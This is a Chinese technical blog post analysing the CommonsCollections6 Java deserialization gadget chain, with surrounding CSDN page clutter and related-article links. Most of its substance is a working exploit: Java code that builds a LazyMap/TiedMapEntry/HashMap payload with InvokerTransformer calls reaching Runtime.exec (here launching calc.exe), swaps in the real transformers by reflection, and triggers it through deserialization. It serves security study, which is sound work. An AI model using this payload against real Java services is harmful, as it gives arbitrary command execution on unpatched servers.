Java反序列化漏洞——CommonsCollections6链分析

最新推荐文章于 2024-03-01 15:22:24 发布
最新推荐文章于 2024-03-01 15:22:24 发布
阅读量563 收藏 1
点赞数
分类专栏: # java漏洞 文章标签: 安全 web安全 java 反序列化 CC6 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thunderclap_/article/details/129090005
版权

一、前因

因为在jdk8u71之后的版本中,sun.reflect.annotation.AnnotationInvocationHandler#readObject的逻辑发生了变化,导致CC1中的两个链条都不能使用,所有我们需要找一个在高版本中也可用的链条。

/*
Gadget chain:
java.io.ObjectInputStream.readObject()
java.util.HashMap.readObject()
java.util.HashMap.hash()
org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
org.apache.commons.collections.map.LazyMap.get()
org.apache.commons.collections.functors.ChainedTransformer.transform()
org.apache.commons.collections.functors.InvokerTransformer.transform()
java.lang.reflect.Method.invoke()
java.lang.Runtime.exec()
*/

从上可以看出,我们在LazyMap#get部分到Runtime.exec部分的都没有变化,只是上面的调用部分发生了改变,所以说:解决java高版本利用问题,实际上就是在找上下文中是否还有其他调用LazyMap#get()的地方

二、解决办法

如上就是找到的类为org.apache.commons.collections.keyvalue.TiedMapEntry,在其getValue方法中调用了this.map.get。而其hashCode方法调用了getValue方法

所以,欲触发LazyMap利⽤链,要找到就是哪⾥调⽤了TiedMapEntry#hashCode

ysoserial中,是利⽤java.util.HashSet#readObject 到HashMap#put() 到HashMap#hash(key),最后到TiedMapEntry#hashCode() 。

实际上在java.util.HashMap#readObject 中就可以找到HashMap#hash() 的调⽤,去掉了最前⾯的两次调⽤,在HashMap的readObject⽅法中,调⽤到了hash(key) ,⽽hash⽅法中,调⽤到了key.hashCode() 。所以,我们只需要让这个key等于TiedMapEntry对象,即可连接上前⾯的分析过程,构成⼀个完整的Gadget。

三、代码构造

1.前面的没有变化,构造一个恶意的LazyMap

  • 为了避免本地调试时触发命令执行,构造LazyMap的时候先⽤了⼀个⼈畜⽆害的fakeTransformers 对象,等最后要⽣成Payload的

时候,再把真正的transformers 替换进去。

Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
Transformer[] transformers = new Transformer[] {
        new ConstantTransformer(Runtime.class),
        new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
        new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
        new InvokerTransformer("exec", new Class[] { String.class }, new String[] { "calc.exe" }),
        new ConstantTransformer(1),
};
Transformer transformerChain = new ChainedTransformer(fakeTransformers);
Map innerMap = new HashMap();
Map outerMap = LazyMap.decorate(innerMap, transformerChain);

2.拿到了⼀个恶意的LazyMap对象outerMap ,将其作为TiedMapEntry的map属性:

TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");

3.写入HashMap

  • 为了调⽤TiedMapEntry#hashCode() ,我们需要将tme 对象作为HashMap 的⼀个key。注意,这⾥我们需要新建⼀个HashMap,⽽不是⽤之前LazyMap利⽤链⾥的那个HashMap,两者没任何关系

Map expMap = new HashMap();
expMap.put(tme, "valuevalue");
outerMap.remove("keykey");

  • 为什么上面第三行有一个outerMap.remove("keykey");,主要是因为我在expMap.put(tme, "valuevalue"); 这个语句⾥⾯,HashMap的put⽅法中,也有调⽤到hash(key) ,这⾥就导致LazyMap 这个利⽤链在这⾥被调⽤了⼀遍,因为前⾯⽤了fakeTransformers ,所以此时并没有触发命令执⾏,但实际上也对我们构造Payload产⽣了影响。所以只需要将这个移除即可。

4.替换transformers数组

  • 这里利用了反射调用了修改属性的方式进行替换

Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
f.setAccessible(true);
f.set(transformerChain, transformers);

5.本地测试

ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(barr);
oos.writeObject(expMap);
oos.close();

ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));
objectInputStream.readObject();

Thunderclap_
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java序列漏洞(Apache Commons Collections)
m0_61506558的博客
08-08 766
CC对JDK标准库的集合类进行了扩展,添加了一些数据结构,并且提供了工具类2015年1月28日,有两个黑客发现了CC的漏洞利用链2.2 源码分析transform()方法可以通过射机制来进行任意函数的调用通过链式调用,实现InvokeTransformer方法的自动触发1、对利用类进行序列,然后交给Java程序序列2、在进行序列时,会执行方法,该方法会用setValue对成员变量的Value值进行修改3、value修改触发了。......
Java序列漏洞利用工具.zip
04-10
java序列漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以
JAVA 序列之 Apache Commons Collections 序列漏洞分析
辛勤搬砖的门卫的专栏
03-01 1815
Apache Commons Collections 序列漏洞研究
Java安全研究——序列漏洞之CC链
weixin_43889136的博客
04-13 3988
0x01前言 apachecommons-collections组件下的序列漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc链的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03序列漏洞 序列是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Goby 漏洞更新 | Weblogic Commons Collections 序列代码执行漏洞(CVE-2015-4852)
m0_46699477的博客
05-13 341
WebLogic Server 是一个适用于云和传统环境的应用程序服务器组件。 CVE-2015-4852 WebLogic Commons Collections 组件存在远程代码执行漏洞,允许未经身份验证的攻击者通过 IIOP 协议访问易受攻击的 WebLogic Server 并对其进行破坏。 成功利用此漏洞可导致攻击者接管 WebLogic Server,从而导致远程代码执行。
Java 序列漏洞-Apache Commons Collections4-TreeBag攻击链
cjdgg的博客
10-06 1361
知识点补充可以看看我前面写的CC2和CC3CC4这条链其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用链,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例 TemplatesImpl。
Java序列漏洞静态分析与动态验证研究与实现
最新发布
04-10
Java序列漏洞中存在利用链, 攻击者通常将其与任意命令漏洞结合控制服务器。人工检测序列链需要花费大量的精力, 需要依赖代码审计人员的专业知识。 文章基于污点分析提出 种静态检测和动态验证的方法, ...
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
11-11
Java序列漏洞检查工具V1.2_Weblogic XML序列漏洞检查工具CVE-2017-10271
Java序列漏洞利用工具V1.7.jar
03-25
Java序列漏洞利用工具
6、java序列漏洞.pdf
10-15
Java 序列漏洞 Java 序列漏洞是指在 Java 中,对象的序列序列过程中存在的安全漏洞序列是将对象的状态信息转换为可以存储或传输形式的过程,而序列是将对象数据从按照某一种标准,解析成...
commons-collections-3.2.2-
11-01
用来修补weblogic的序列漏洞,重命名后替换之前Middleware\modules下的的3.2.0版
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
09-10
weblogic10.3.6补丁(java序列漏洞更新步骤).docx
WebLogic Commons Collections组件序列漏洞(CVE-2015-4852)
Darklord.W
10-13 927
WebLogic Commons Collections组件序列漏洞(CVE-2015-4852) 1 漏洞简介. 2 环境搭建. 3 漏洞分析. 4 漏洞验证. 5 漏洞总结及防御方案. 漏洞简介 漏洞描述 Oracle WebLogic Server 10.3.6.0, 12.1.2.0, 12.1.3.0, 12.2.1.0版本中,WLS Security组件允许远程攻击者执行任意命令。攻击者通过向TCP端口7001发送T3协议流量,其中包...
Commons-Collections6 序列 从0开始手写exp
weixin_51458899的博客
04-11 2122
CC6 cc6的出现弥补了前面的cc1的setValue的缺陷,使得它可以在高于jdk8u65的情况下使用,jdk11不行 ysoserial/CommonsCollections6.java at master · frohoff/ysoserial (github.com) 如何手写exp 可以看到 后半段仍然与yso的cc1一致(一直到LazyMap.get) 调用了TiedMapEntry,进去 hashcode里面调用了getvalue 这里是map.get key对应的value如果改成恶
Java序列漏洞——CommonsBeanutils1链分析
Thunderclap的博客
02-20 1449
在创建类的对象的时候可以为comparator赋予特定的比较器,值得注意的是如果没有设定自定义的comparator,其默认为ComparableComparator对象,当然,在调用链中,将会调用他的compare方法。接收两个参数 bean (类对象)和 name(属性名),方法会返回这个类的这个属性的值,但是他不是直接通过射取值,而是通过射调用getter方法获取属性,进而经过恶意的构造,我们可以触发任意的getter方法。getter方法以get开头,setter方法以set开头。
JAVA Apache-CommonsCollections 序列漏洞分析以及漏洞高级利用
weixin_34161083的博客
11-13 385
为什么80%的码农都做不了架构师?>>> ...
Java序列漏洞学习---Apache Commons Collections
gental_z的博客
10-11 907
Java序列漏洞学习—Apache Commons Collections 第一次接触Java安全~~~~ Apache Commons Collections是Apache Commons的组件,该漏洞的问题主要出现在org.apache.commons.collections.Transformer接口上。在Apache commons.collections中有一个InvokerTransformer实现了Transformer接口,主要作用为调用Java射机制来调用任意函数。 影响组件版本:
Apache Commons 工具类介绍及简单使用
TechBirds在路上
02-05 8794
谢谢文章的作者。     Apache Commons包含了很多开源的工具,用于解决平时编程经常会遇到的问题,减少重复劳动。下面是我这几年做开发过程中自己用过的工具类做简单介绍。 组件 功能介绍 BeanUtils 提供了对于JavaBean进行各种操作,克隆对象,属性等等. Betwixt XML与Java对象之间相互转换.
apache commons-collections 序列漏洞分析
谭宇
06-19 710
在这里只记录下对jdk1.8可用的apache commons-collections中执行任意类任意执行方法链,实际程序代码与原作者相同,想知道更多分析思路,请参考原文 环境 jdk1.8 commons-collections-3.2 完整程序 import org.apache.commons.collections.Transformer; import org.apache.common...
常见的Java序列漏洞
05-20
Java序列漏洞是指攻击者通过修改序列对象中的数据,使得序列操作返回恶意对象,从而导致应用程序受到攻击的漏洞。常见的Java序列漏洞包括: 1. JDK 6u45及以下版本的RMI序列漏洞:攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Thunderclap_

点赞、关注加收藏~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值